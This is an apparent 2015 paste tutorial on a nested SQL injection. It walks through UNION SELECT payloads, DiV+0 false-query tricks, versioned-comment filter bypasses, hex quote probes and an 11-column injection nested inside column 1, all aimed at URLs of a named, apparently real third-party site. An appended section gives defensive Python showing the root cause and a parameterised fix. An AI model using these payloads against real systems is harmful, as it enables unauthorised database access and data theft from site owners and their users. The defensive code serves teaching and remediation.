Kyfx

Another SQL injection explanation :) v4

Mar 20th, 2015
Explanation of my challenge
Friends, let's see.
1 - The injection point is:

http://www.onlinepost.in/show.php?page=39
-------------------------------------------------------

2 - So, try to inject:

http://www.onlinepost.in/show.php?page= 39 /*!50000UnIoN*/ aLL SeLeCt+1,2,3,4--

But the page remains the same and no output comes, so DiV+0 is used to make the query false:
-----------------------------------------------------------------------
http://www.onlinepost.in/show.php?page= 39 +DiV+0+/*!50000UnIoN*/ aLL SeLeCt+1,2,3,4--

But the page also remains the same and no output comes.
------------------------------------------------------------------------------------
This code:

http://www.onlinepost.in/show.php?page=39+DiV+0+/*!50000UnIoN*/ aLL SeLeCt+1,2,3,4-- -

doesn't show a vulnerable column.
So first you try with union select 1111,2222,3333,4444-- - and search for those numbers in the source code. If you can't find them, that is why I check for another injection in one of the possible four columns. You try the second injection by adding ' after each column, in hex, like:

/*!50000UnIoN*/ aLL SeLeCt+0x3127,2,3,4-- -

You will find that 2' or 3' or 4' (in hex) doesn't give an error, but 1' in hex (0x3127) gives you an error. So there is a possible second injection.

---------------------------------------------------------------------------------------------------------
Then you try to find the number of columns for the second injection. As you see in my code, there are 11 columns for the second injection. The complete second injection is done inside column 1. So we have a double injection, BUT this is not the same as error-based double injection. This is injection inside injection,
like:
http://www.onlinepost.in/show.php?page= 39 +DiV+0+/*!50000UnIoN*/ aLL SeLeCt+"1'+DiV+0+/*!50000UnIoN*/+aLL+SeLeCt+1,2,3,4,5,6,7,8,9,10,11-- -",2,3,4--
and double quotes are used because magic_quotes are off, so we don't need hex.
---------------------------------------------------------------------------------------------
So we successfully injected. If there is any problem in my tutorial, please tell me.
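
The root cause behind the "injection inside injection" above, shown from the defender's side as an added example that is not part of the original paste: a value returned by the first query is concatenated into a second query, so binding only the request parameter is not enough. SQLite stands in for MySQL here, and the tables, column names and function names are assumptions, since the paste does not show the site's code.

```python
import sqlite3

def make_db():
    # Constructed schema and rows; the paste does not show the site's real tables.
    db = sqlite3.connect(":memory:")
    db.execute("CREATE TABLE pages(id INTEGER PRIMARY KEY, author_ref TEXT, title TEXT)")
    db.execute("CREATE TABLE authors(ref TEXT, name TEXT)")
    db.execute("INSERT INTO authors VALUES ('1', 'alice')")
    db.execute("INSERT INTO pages VALUES (39, '1', 'Hello')")
    # Row whose first selected column holds 1' (the paste's 0x3127 probe value).
    db.execute("INSERT INTO pages VALUES (40, ?, 'Odd')", ("1'",))
    return db

def show_page_vulnerable(db, page):
    # Query 1: the request parameter is concatenated into SQL.
    row = db.execute(
        "SELECT author_ref, title FROM pages WHERE id = " + page).fetchone()
    if row is None:
        return None
    # Query 2: a value that came back from query 1 is concatenated again.
    # This nested sink is what the paste calls "injection inside injection".
    author = db.execute(
        "SELECT name FROM authors WHERE ref = '" + row[0] + "'").fetchone()
    return row[1], author[0] if author else None

def show_page_hardened(db, page):
    # Reject anything that is not a plain decimal id before touching SQL.
    if not (page.isascii() and page.isdigit()):
        return None
    row = db.execute(
        "SELECT author_ref, title FROM pages WHERE id = ?", (int(page),)).fetchone()
    if row is None:
        return None
    # Database-sourced values are bound too: they are data, never SQL text.
    author = db.execute(
        "SELECT name FROM authors WHERE ref = ?", (row[0],)).fetchone()
    return row[1], author[0] if author else None

def second_query_breaks(db, page):
    # True when the nested query fails to parse, the symptom the paste probes for.
    try:
        show_page_vulnerable(db, page)
        return False
    except sqlite3.OperationalError:
        return True
```

With both queries bound, the value 1' in column 1 is looked up as a literal string and simply matches no author, so the error signal the paste relies on disappears.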